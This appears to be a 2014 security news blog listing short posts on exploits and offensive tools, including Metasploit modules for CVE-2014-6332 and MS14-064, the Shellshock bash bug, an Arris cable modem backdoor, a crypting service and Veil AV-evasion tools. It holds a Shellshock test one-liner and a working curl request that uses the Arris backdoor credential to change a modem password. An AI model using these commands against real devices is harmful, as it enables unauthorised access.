CVE-2014-6332: it’s raining shells

by admin

Saturday, November 15th, 2014 at 2:34 am

Quick and dirty Metasploit module based on @yuange's code from 2009. This vulnerability affects everything from Windows 95 with IE 3.0 through Windows 10 with IE 11. https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/ Module here: ms14_064_ie_olerce.rb

MS14-064 OLE Package Manager Code Execution – Metasploit

by admin

Saturday, November 15th, 2014 at 1:58 am

This module exploits a vulnerability in Windows Object Linking and Embedding (OLE) that allows arbitrary code execution and was publicly exploited in the wild as a bypass of the MS14-060 patch.
That Microsoft update tried to fix the vulnerability publicly known as “Sandworm”. Platforms from Windows Vista SP2 all the way to Windows 8, as well as Windows Server 2008 and 2012, are known to be vulnerable.
http://www.exploit-db.com/exploits/35236/

Exploiting a Philips Smart TV

by admin

Saturday, November 15th, 2014 at 1:56 am

Using a remote stack overflow in libupnp, Fred was able to take control of his TV, using the serial port on the back of the TV: http://www.fredericb.info/2014/11/exploitation-of-philips-smart-tv.html

DPAPIck updated

by admin

Wednesday, October 15th, 2014 at 3:46 pm

DPAPIck is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API). The tool was updated to support Windows versions all the way to 8.1.

The recoverable secrets are:

  • EFS certificates
  • MSN Messenger credentials
  • Internet Explorer form passwords
  • Outlook passwords
  • Google Talk credentials
  • Google Chrome form passwords
  • Wireless network keys (WEP key and WPA-PMK)
  • Skype credentials

Src: dpapick.com

CVE-2014-6271 remote vulnerability in bash

by admin

Wednesday, September 24th, 2014 at 1:11 pm


A remotely exploitable vulnerability has been discovered in bash on Linux. The vulnerability affects Debian as well as other Linux distros; patch ASAP.

$ env x='() { :;}; echo vulnerable' bash -c "echo test"

more info: securityblog.redhat.com

Arris Cable Modem Backdoor

by admin

Wednesday, September 24th, 2014 at 1:06 pm

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

src: console-cowboys.blogspot.com

Rcrypt Online Crypting Service

by admin

Thursday, September 11th, 2014 at 1:18 am

http://rcrypt.0xrage.com/
Upload your executable file to encrypt and pack it. So far it supports rcrypt, fsg, upx, mew, upolyx, petite, and afx pecrypt.

Data mining with Veil-PowerView

by admin

Tuesday, July 22nd, 2014 at 2:31 pm

Quickly find and explore shares our current user has access to: https://www.veil-framework.com/hunting-sensitive-data-veil-framework/

Kali Linux 1.0.8 Released with EFI Boot Support

by admin

Tuesday, July 22nd, 2014 at 10:52 am


Kali’s new image is an EFI-bootable ISO hybrid image that supports Live USB Encrypted Persistence with LUKS Nuke support, out of the box. More info @ http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/

Veil-Catapult

by admin

Sunday, July 13th, 2014 at 3:48 pm

The Veil Framework recently added a payload delivery tool, Veil-Catapult. It works like SMBexec, utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using a temporary SMB server.
